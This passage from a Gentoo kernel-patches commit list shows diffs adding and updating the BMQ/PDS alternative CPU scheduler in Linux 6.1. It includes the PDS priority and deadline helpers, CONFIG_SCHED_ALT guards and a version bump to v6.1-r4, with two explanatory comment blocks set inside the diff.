- late_initcall(sched_init_debug);
- 
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_SMP
- 
- static cpumask_var_t		sd_sysctl_cpus;
-@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
- 	memset(&p->stats, 0, sizeof(p->stats));
- #endif
- }
-+#endif /* !CONFIG_SCHED_ALT */
- 
- void resched_latency_warn(int cpu, u64 latency)
- {
-diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
-index f26ab2675f7d..480d4ad16d45 100644
---- a/kernel/sched/idle.c
-+++ b/kernel/sched/idle.c
-@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
- 		do_idle();
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * idle-task scheduling class.
-  */
-@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
- 	.switched_to		= switched_to_idle,
- 	.update_curr		= update_curr_idle,
- };
-+#endif
-diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
-new file mode 100644
-index 000000000000..56a649d02e49
---- /dev/null
-+++ b/kernel/sched/pds.h
-@@ -0,0 +1,127 @@
-+#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
-+
-+static int sched_timeslice_shift = 22;
-+
-+#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
-+
-+/*
-+ * Common interfaces
-+ */
-+static inline void sched_timeslice_imp(const int timeslice_ms)
-+{
-+	if (2 == timeslice_ms)
-+		sched_timeslice_shift = 21;
-+}
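/*
 * Editor's arithmetic, illustrative only: the shift turns the ns-based
 * rq clock into one coarse "time edge" tick per timeslice:
 *
 *   1 << 22 ns = 4,194,304 ns ~= 4.2 ms  (default 4 ms timeslice)
 *   1 << 21 ns = 2,097,152 ns ~= 2.1 ms  (when the timeslice is 2 ms)
 *
 * so one deadline unit corresponds to roughly one timeslice.
 */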
-+
-+static inline int
-+task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
-+{
-+	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
-+
-+	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
-+		      "pds: task_sched_prio_normal() delta %lld\n", delta))
-+		return NORMAL_PRIO_NUM - 1;
-+
-+	return (delta < 0) ? 0 : delta;
-+}
-+
-+static inline int task_sched_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio :
-+		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
-+}
-+
-+static inline int
-+task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
-+		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
-+}
-+
-+static inline int sched_prio2idx(int prio, struct rq *rq)
-+{
-+	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
-+		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
-+						  rq->time_edge);
-+}
-+
-+static inline int sched_idx2prio(int idx, struct rq *rq)
-+{
-+	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
-+		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
-+				NORMAL_PRIO_MOD(rq->time_edge));
-+}
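/*
 * Illustrative check, not part of the patch: for any normal priority
 * and any rq->time_edge, the two helpers above are inverses.  With
 * NORMAL_PRIO_NUM a power of two and off = prio - MIN_NORMAL_PRIO:
 *
 *   sched_idx2prio(sched_prio2idx(prio, rq), rq)
 *     == MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(off + rq->time_edge
 *                 + NORMAL_PRIO_NUM - NORMAL_PRIO_MOD(rq->time_edge))
 *     == MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(off)
 *     == prio
 *
 * i.e. the queue heads form a ring rotated by time_edge, and
 * sched_idx2prio() simply rotates back.
 */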
-+
-+static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
-+{
-+	if (p->prio >= MAX_RT_PRIO)
-+		p->deadline = (rq->clock >> sched_timeslice_shift) +
-+			p->static_prio - (MAX_PRIO - NICE_WIDTH);
-+}
-+
-+int task_running_nice(struct task_struct *p)
-+{
-+	return (p->prio > DEFAULT_PRIO);
-+}
-+
-+static inline void update_rq_time_edge(struct rq *rq)
-+{
-+	struct list_head head;
-+	u64 old = rq->time_edge;
-+	u64 now = rq->clock >> sched_timeslice_shift;
-+	u64 prio, delta;
-+
-+	if (now == old)
-+		return;
-+
-+	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
-+	INIT_LIST_HEAD(&head);
-+
-+	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
-+		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
-+				      NORMAL_PRIO_MOD(prio + old), &head);
-+
-+	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
-+		rq->queue.bitmap[2] >> delta;
-+	rq->time_edge = now;
-+	if (!list_empty(&head)) {
-+		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
-+		struct task_struct *p;
-+
-+		list_for_each_entry(p, &head, sq_node)
-+			p->sq_idx = idx;
-+
-+		list_splice(&head, rq->queue.heads + idx);
-+		rq->queue.bitmap[2] |= 1UL;
-+	}
-+}
-+
-+static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
-+{
-+	p->time_slice = sched_timeslice_ns;
-+	sched_renew_deadline(p, rq);
-+	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
-+		requeue_task(p, rq, task_sched_prio_idx(p, rq));
-+}
-+
-+static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
-+{
-+	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
-+
-+	if (unlikely(p->deadline > max_dl))
-+		p->deadline = max_dl;
-+}
-+
-+static void sched_task_fork(struct task_struct *p, struct rq *rq)
-+{
-+	sched_renew_deadline(p, rq);
-+}
-+
-+static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
-+{
-+	time_slice_expired(p, rq);
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline void sched_task_ttwu(struct task_struct *p) {}
-+#endif
-+static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
-diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
-index 0f310768260c..bd38bf738fe9 100644
---- a/kernel/sched/pelt.c
-+++ b/kernel/sched/pelt.c
-@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
- 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * sched_entity:
-  *
-@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
- 
- 	return 0;
- }
-+#endif
- 
--#ifdef CONFIG_SCHED_THERMAL_PRESSURE
-+#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
- /*
-  * thermal:
-  *
-diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
-index 3a0e0dc28721..e8a7d84aa5a5 100644
---- a/kernel/sched/pelt.h
-+++ b/kernel/sched/pelt.h
-@@ -1,13 +1,15 @@
- #ifdef CONFIG_SMP
- #include "sched-pelt.h"
- 
-+#ifndef CONFIG_SCHED_ALT
- int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
- int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
- int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
- int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
- int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
-+#endif
- 
--#ifdef CONFIG_SCHED_THERMAL_PRESSURE
-+#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
- int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
- 
- static inline u64 thermal_load_avg(struct rq *rq)
-@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
- 	return PELT_MIN_DIVIDER + avg->period_contrib;
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- static inline void cfs_se_util_change(struct sched_avg *avg)
- {
- 	unsigned int enqueued;
-@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
- 	return rq_clock_pelt(rq_of(cfs_rq));
- }
- #endif
-+#endif /* CONFIG_SCHED_ALT */
- 
- #else
- 
-+#ifndef CONFIG_SCHED_ALT
- static inline int
- update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
- {
-@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
- {
- 	return 0;
- }
-+#endif
- 
- static inline int
- update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
-diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
-index a4a20046e586..c363693cd869 100644
---- a/kernel/sched/sched.h
-+++ b/kernel/sched/sched.h
-@@ -5,6 +5,10 @@
- #ifndef _KERNEL_SCHED_SCHED_H
- #define _KERNEL_SCHED_SCHED_H
- 
-+#ifdef CONFIG_SCHED_ALT
-+#include "alt_sched.h"
-+#else
-+
- #include <linux/sched/affinity.h>
- #include <linux/sched/autogroup.h>
- #include <linux/sched/cpufreq.h>
-@@ -3183,4 +3187,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
- 	cgroup_account_cputime(curr, delta_exec);
- }
- 
-+static inline int task_running_nice(struct task_struct *p)
-+{
-+	return (task_nice(p) > 0);
-+}
-+#endif /* !CONFIG_SCHED_ALT */
- #endif /* _KERNEL_SCHED_SCHED_H */
-diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
-index 857f837f52cb..5486c63e4790 100644
---- a/kernel/sched/stats.c
-+++ b/kernel/sched/stats.c
-@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 	} else {
- 		struct rq *rq;
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 		struct sched_domain *sd;
- 		int dcount = 0;
-+#endif
- #endif
- 		cpu = (unsigned long)(v - 2);
- 		rq = cpu_rq(cpu);
-@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 		seq_printf(seq, "\n");
- 
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 		/* domain-specific stats */
- 		rcu_read_lock();
- 		for_each_domain(cpu, sd) {
-@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 			    sd->ttwu_move_balance);
- 		}
- 		rcu_read_unlock();
-+#endif
- #endif
- 	}
- 	return 0;
-diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
-index 84a188913cc9..53934e7ef5db 100644
---- a/kernel/sched/stats.h
-+++ b/kernel/sched/stats.h
-@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
- 
- #endif /* CONFIG_SCHEDSTATS */
- 
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_FAIR_GROUP_SCHED
- struct sched_entity_stats {
- 	struct sched_entity     se;
-@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
- #endif
- 	return &task_of(se)->stats;
- }
-+#endif /* CONFIG_SCHED_ALT */
- 
- #ifdef CONFIG_PSI
- void psi_task_change(struct task_struct *task, int clear, int set);
-diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
-index 8739c2a5a54e..d8dd6c15eb47 100644
---- a/kernel/sched/topology.c
-+++ b/kernel/sched/topology.c
-@@ -3,6 +3,7 @@
-  * Scheduler topology setup/handling methods
-  */
- 
-+#ifndef CONFIG_SCHED_ALT
- DEFINE_MUTEX(sched_domains_mutex);
- 
- /* Protected by sched_domains_mutex: */
-@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
-  */
- 
- static int default_relax_domain_level = -1;
-+#endif /* CONFIG_SCHED_ALT */
- int sched_domain_level_max;
- 
-+#ifndef CONFIG_SCHED_ALT
- static int __init setup_relax_domain_level(char *str)
- {
- 	if (kstrtoint(str, 0, &default_relax_domain_level))
-@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
- 
- 	return sd;
- }
-+#endif /* CONFIG_SCHED_ALT */
- 
- /*
-  * Topology list, bottom-up.
-@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
- 	sched_domain_topology_saved = NULL;
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_NUMA
- 
- static const struct cpumask *sd_numa_mask(int cpu)
-@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
- 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
- 	mutex_unlock(&sched_domains_mutex);
- }
-+#else /* CONFIG_SCHED_ALT */
-+void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
-+			     struct sched_domain_attr *dattr_new)
-+{}
-+
-+#ifdef CONFIG_NUMA
-+int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
-+{
-+	return best_mask_cpu(cpu, cpus);
-+}
-+#endif /* CONFIG_NUMA */
-+#endif
-diff --git a/kernel/sysctl.c b/kernel/sysctl.c
-index c6d9dec11b74..2bc42ce8b48e 100644
---- a/kernel/sysctl.c
-+++ b/kernel/sysctl.c
-@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
- 
- /* Constants used for minimum and maximum */
- 
-+#ifdef CONFIG_SCHED_ALT
-+extern int sched_yield_type;
-+#endif
-+
- #ifdef CONFIG_PERF_EVENTS
- static const int six_hundred_forty_kb = 640 * 1024;
- #endif
-@@ -1633,6 +1637,7 @@ int proc_do_static_key(struct ctl_table *table, int write,
- }
- 
- static struct ctl_table kern_table[] = {
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_NUMA_BALANCING
- 	{
- 		.procname	= "numa_balancing",
-@@ -1652,6 +1657,7 @@ static struct ctl_table kern_table[] = {
- 		.extra1		= SYSCTL_ZERO,
- 	},
- #endif /* CONFIG_NUMA_BALANCING */
-+#endif /* !CONFIG_SCHED_ALT */
- 	{
- 		.procname	= "panic",
- 		.data		= &panic_timeout,
-@@ -1953,6 +1959,17 @@ static struct ctl_table kern_table[] = {
- 		.proc_handler	= proc_dointvec,
- 	},
- #endif
-+#ifdef CONFIG_SCHED_ALT
-+	{
-+		.procname	= "yield_type",
-+		.data		= &sched_yield_type,
-+		.maxlen		= sizeof (int),
-+		.mode		= 0644,
-+		.proc_handler	= &proc_dointvec_minmax,
-+		.extra1		= SYSCTL_ZERO,
-+		.extra2		= SYSCTL_TWO,
-+	},
-+#endif
- #if defined(CONFIG_S390) && defined(CONFIG_SMP)
- 	{
- 		.procname	= "spin_retry",
-diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
-index 3ae661ab6260..35f0176dcdb0 100644
---- a/kernel/time/hrtimer.c
-+++ b/kernel/time/hrtimer.c
-@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
- 	int ret = 0;
- 	u64 slack;
- 
-+#ifndef CONFIG_SCHED_ALT
- 	slack = current->timer_slack_ns;
- 	if (dl_task(current) || rt_task(current))
-+#endif
- 		slack = 0;
- 
- 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
-diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
-index cb925e8ef9a8..67d823510f5c 100644
---- a/kernel/time/posix-cpu-timers.c
-+++ b/kernel/time/posix-cpu-timers.c
-@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
- 	u64 stime, utime;
- 
- 	task_cputime(p, &utime, &stime);
--	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
-+	store_samples(samples, stime, utime, tsk_seruntime(p));
- }
- 
- static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
-@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
- 	}
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- static inline void check_dl_overrun(struct task_struct *tsk)
- {
- 	if (tsk->dl.dl_overrun) {
-@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
- 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
- 	}
- }
-+#endif
- 
- static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
- {
-@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
- 	u64 samples[CPUCLOCK_MAX];
- 	unsigned long soft;
- 
-+#ifndef CONFIG_SCHED_ALT
- 	if (dl_task(tsk))
- 		check_dl_overrun(tsk);
-+#endif
- 
- 	if (expiry_cache_is_inactive(pct))
- 		return;
-@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
- 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
- 	if (soft != RLIM_INFINITY) {
- 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
--		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
-+		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
- 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
- 
- 		/* At the hard limit, send SIGKILL. No further action. */
-@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
- 			return true;
- 	}
- 
-+#ifndef CONFIG_SCHED_ALT
- 	if (dl_task(tsk) && tsk->dl.dl_overrun)
- 		return true;
-+#endif
- 
- 	return false;
- }
-diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
-index a2d301f58ced..2ccdede8585c 100644
---- a/kernel/trace/trace_selftest.c
-+++ b/kernel/trace/trace_selftest.c
-@@ -1143,10 +1143,15 @@ static int trace_wakeup_test_thread(void *data)
- {
- 	/* Make this a -deadline thread */
- 	static const struct sched_attr attr = {
-+#ifdef CONFIG_SCHED_ALT
-+		/* No deadline on BMQ/PDS, use RR */
-+		.sched_policy = SCHED_RR,
-+#else
- 		.sched_policy = SCHED_DEADLINE,
- 		.sched_runtime = 100000ULL,
- 		.sched_deadline = 10000000ULL,
- 		.sched_period = 10000000ULL
-+#endif
- 	};
- 	struct wakeup_test_data *x = data;
- 


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-09 12:47 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-09 12:47 UTC (permalink / raw
  To: gentoo-commits

commit:     85941b985a0a1a23d17486db978bd18577b97dcc
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  9 12:47:03 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  9 12:47:03 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=85941b98

Remove BMQ Fix patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 5021_sched-alt-missing-rq-lock-irq-function.patch | 30 -----------------------
 1 file changed, 30 deletions(-)

diff --git a/5021_sched-alt-missing-rq-lock-irq-function.patch b/5021_sched-alt-missing-rq-lock-irq-function.patch
deleted file mode 100644
index 04cca612..00000000
--- a/5021_sched-alt-missing-rq-lock-irq-function.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 4157360d2e1cbdfb8065f151dbe057b17188a23f Mon Sep 17 00:00:00 2001
-From: Tor Vic <torvic9@mailbox.org>
-Date: Mon, 7 Nov 2022 15:11:54 +0100
-Subject: [PATCH] sched/alt: Add missing rq_lock_irq() function to header file
-
----
- kernel/sched/alt_sched.h | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
-index 93ff3bddd36f..a00bc84b93b2 100644
---- a/kernel/sched/alt_sched.h
-+++ b/kernel/sched/alt_sched.h
-@@ -387,6 +387,13 @@ task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
- 	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
- }
- 
-+static inline void
-+rq_lock_irq(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irq(&rq->lock);
-+}
-+
- static inline void
- rq_lock(struct rq *rq, struct rq_flags *rf)
- 	__acquires(rq->lock)
--- 
-GitLab
-


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-09 12:40 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-09 12:40 UTC (permalink / raw
  To: gentoo-commits

commit:     aa99b5941813b8267a0dee6085aadda60385aede
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  9 12:39:52 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  9 12:39:52 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=aa99b594

Bump BMQ Patch to 6.1-r4

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |   2 +-
 ... => 5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch | 216 ++++++++++++++-------
 2 files changed, 148 insertions(+), 70 deletions(-)

diff --git a/0000_README b/0000_README
index 1fb22543..62ade3e6 100644
--- a/0000_README
+++ b/0000_README
@@ -139,6 +139,6 @@ Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
 
-Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch
+Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
 From:   https://gitlab.com/alfredchen/projectc
 Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
similarity index 98%
rename from 5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch
rename to 5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
index 783f3bca..7c2a77d3 100644
--- a/5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch
+++ b/5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
@@ -369,7 +369,7 @@ index 94125d3b6893..c87ba766d354 100644
  
 +menuconfig SCHED_ALT
 +	bool "Alternative CPU Schedulers"
-+	default n
++	default y
 +	help
 +	  This feature enables alternative CPU schedulers.
 +
@@ -632,10 +632,10 @@ index 976092b7bd45..31d587c16ec1 100644
  obj-y += build_utility.o
 diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
 new file mode 100644
-index 000000000000..4bea0c025475
+index 000000000000..a9e906b229eb
 --- /dev/null
 +++ b/kernel/sched/alt_core.c
-@@ -0,0 +1,7912 @@
+@@ -0,0 +1,7982 @@
 +/*
 + *  kernel/sched/alt_core.c
 + *
@@ -665,7 +665,6 @@ index 000000000000..4bea0c025475
 +#include <linux/init_task.h>
 +#include <linux/kcov.h>
 +#include <linux/kprobes.h>
-+#include <linux/profile.h>
 +#include <linux/nmi.h>
 +#include <linux/scs.h>
 +
@@ -706,7 +705,7 @@ index 000000000000..4bea0c025475
 +#define sched_feat(x)	(0)
 +#endif /* CONFIG_SCHED_DEBUG */
 +
-+#define ALT_SCHED_VERSION "v6.1-r0"
++#define ALT_SCHED_VERSION "v6.1-r4"
 +
 +/* rt_prio(prio) defined in include/linux/sched/rt.h */
 +#define rt_task(p)		rt_prio((p)->prio)
@@ -786,7 +785,8 @@ index 000000000000..4bea0c025475
 +#ifdef CONFIG_SCHED_SMT
 +static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
 +#endif
-+static cpumask_t sched_rq_watermark[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
++static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
++static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
 +
 +/* sched_queue related functions */
 +static inline void sched_queue_init(struct sched_queue *q)
@@ -810,44 +810,66 @@ index 000000000000..4bea0c025475
 +	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
 +}
 +
++static inline void
++clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
++}
++
++static inline void
++set_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
++}
++
++static atomic_t sched_prio_record = ATOMIC_INIT(0);
++
 +/* water mark related functions */
-+static inline void update_sched_rq_watermark(struct rq *rq)
++static inline void update_sched_preempt_mask(struct rq *rq)
 +{
-+	unsigned long watermark = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	unsigned long last_wm = rq->watermark;
-+	unsigned long i;
-+	int cpu;
++	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	unsigned long last_prio = rq->prio;
++	int cpu, pr;
 +
-+	if (watermark == last_wm)
++	if (prio == last_prio)
 +		return;
 +
-+	rq->watermark = watermark;
++	rq->prio = prio;
 +	cpu = cpu_of(rq);
-+	if (watermark < last_wm) {
-+		for (i = last_wm; i > watermark; i--)
-+			cpumask_clear_cpu(cpu, sched_rq_watermark + SCHED_QUEUE_BITS - i);
++	pr = atomic_read(&sched_prio_record);
++
++	if (prio < last_prio) {
++		if (IDLE_TASK_SCHED_PRIO == last_prio) {
++			cpumask_clear_cpu(cpu, sched_idle_mask);
++			last_prio -= 2;
 +#ifdef CONFIG_SCHED_SMT
-+		if (static_branch_likely(&sched_smt_present) &&
-+		    IDLE_TASK_SCHED_PRIO == last_wm)
-+			cpumask_andnot(&sched_sg_idle_mask,
-+				       &sched_sg_idle_mask, cpu_smt_mask(cpu));
++			if (static_branch_likely(&sched_smt_present))
++				cpumask_andnot(&sched_sg_idle_mask,
++					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
 +#endif
++		}
++		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
++
 +		return;
 +	}
-+	/* last_wm < watermark */
-+	for (i = watermark; i > last_wm; i--)
-+		cpumask_set_cpu(cpu, sched_rq_watermark + SCHED_QUEUE_BITS - i);
++	/* last_prio < prio */
++	if (IDLE_TASK_SCHED_PRIO == prio) {
++		cpumask_set_cpu(cpu, sched_idle_mask);
++		prio -= 2;
 +#ifdef CONFIG_SCHED_SMT
-+	if (static_branch_likely(&sched_smt_present) &&
-+	    IDLE_TASK_SCHED_PRIO == watermark) {
-+		cpumask_t tmp;
++		if (static_branch_likely(&sched_smt_present)) {
++			cpumask_t tmp;
 +
-+		cpumask_and(&tmp, cpu_smt_mask(cpu), sched_rq_watermark);
-+		if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
-+			cpumask_or(&sched_sg_idle_mask,
-+				   &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+	}
++			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
++			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
++				cpumask_or(&sched_sg_idle_mask,
++					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
++		}
 +#endif
++	}
++	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
 +}
 +
 +/*
@@ -1369,8 +1391,8 @@ index 000000000000..4bea0c025475
 + * Context: rq->lock
 + */
 +#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
-+	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
 +	sched_info_dequeue(rq, p);						\
++	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
 +										\
 +	list_del(&p->sq_node);							\
 +	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
@@ -1378,7 +1400,7 @@ index 000000000000..4bea0c025475
 +
 +#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
 +	sched_info_enqueue(rq, p);					\
-+	psi_enqueue(p, flags);						\
++	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
 +									\
 +	p->sq_idx = task_sched_prio_idx(p, rq);				\
 +	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
@@ -1411,7 +1433,7 @@ index 000000000000..4bea0c025475
 +		  task_cpu(p), cpu_of(rq));
 +
 +	__SCHED_ENQUEUE_TASK(p, rq, flags);
-+	update_sched_rq_watermark(rq);
++	update_sched_preempt_mask(rq);
 +	++rq->nr_running;
 +#ifdef CONFIG_SMP
 +	if (2 == rq->nr_running)
@@ -1436,7 +1458,7 @@ index 000000000000..4bea0c025475
 +				  rq->queue.bitmap);
 +		p->sq_idx = idx;
 +		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+		update_sched_rq_watermark(rq);
++		update_sched_preempt_mask(rq);
 +	}
 +}
 +
@@ -2007,11 +2029,13 @@ index 000000000000..4bea0c025475
 +
